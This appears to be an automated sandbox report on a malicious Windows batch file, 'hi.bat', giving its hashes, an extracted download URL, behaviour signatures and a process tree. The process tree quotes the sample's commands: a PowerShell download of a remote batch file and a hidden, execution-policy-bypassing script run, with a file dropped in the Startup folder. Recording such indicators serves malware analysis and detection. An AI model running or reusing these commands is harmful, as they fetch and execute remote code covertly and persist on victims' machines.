Analysis
-
max time kernel
12s -
max time network
14s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08/04/2024, 14:58
Static task
static1
Behavioral task
behavioral1
Sample
hi.bat
Resource
win10v2004-20240226-en
General
-
Target
hi.bat
-
Size
3KB
-
MD5
ea7196f7f2266406e53da03c0a5e49fc
-
SHA1
758c5fce5272f607c0a7379cd245fc5be4568925
-
SHA256
b82a2f4c60f83e3185b676475cb71706423cbcca17506e929b8c14933e8ab706
-
SHA512
92e603b9209d1120b2e523f70ed29375b1fe6023a09545eb77cda62a0d2c43969c11a44521af5bbb725c3c63384f76111704441111628a0306939f7090074d71
Malware Config
Extracted
https://raw.githubusercontent.com/VisoXC/MisterBombastic/main/don/hallo.bat
Signatures
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\temp.ps1 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 4376 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3420 powershell.exe 3420 powershell.exe 4336 powershell.exe 4336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 4336 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3540 wrote to memory of 3420 3540 cmd.exe 86 PID 3540 wrote to memory of 3420 3540 cmd.exe 86 PID 3540 wrote to memory of 4336 3540 cmd.exe 90 PID 3540 wrote to memory of 4336 3540 cmd.exe 90 PID 4336 wrote to memory of 1188 4336 powershell.exe 92 PID 4336 wrote to memory of 1188 4336 powershell.exe 92 PID 1188 wrote to memory of 4376 1188 cmd.exe 101 PID 1188 wrote to memory of 4376 1188 cmd.exe 101
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hi.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/VisoXC/MisterBombastic/main/don/hallo.bat', 'C:\Users\Admin\AppData\Roaming\Backup\temp.bat')"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Backup\temp.ps1" -WindowStyle Hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Backup\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\timeout.exetimeout /t 604⤵
- Delays execution with timeout.exe
PID:4376
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211B
MD5f15fcd87915d2a35f972d432a7815563
SHA16fb98ddaff19ad02a6bb6ddf9269369ee287e1b4
SHA2562053d7cfe7ee9c5b7e141c54ca305a6bcb59b96031cc32863f243ca0bbb33b6a
SHA5129bbb2d5bebe603ba52fb166f11d2f7de7e5781d8b7875958a07ef2d41075a02d835687e87317865fcf77858c92274e54cb616794b77860b47f60a0f01055db91
-
Filesize
82B
MD5c6dbccf352c7f8779106d63732d85e5f
SHA14c4171158ae7ef1b406b4e6c44480ece6bc96f61
SHA2569a8c7190e1b6845db7659ddadad929a5bec48665e702af0771b8bf84cfa2e905
SHA512e260b28a26008d99e47b75f0c470edab08af47d6334b009d23755fba6b1ba41bb986fa09fe4dc8a94706fc64e9d60a471650a3ee74bb5c1458d9a4d06d16b3b4
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5e9c5f9e7437285aa87e4433bc7e0f9d7
SHA12363ddac1155a065a54dc6a0fc307d86bd88246b
SHA2560cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520
SHA5127cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82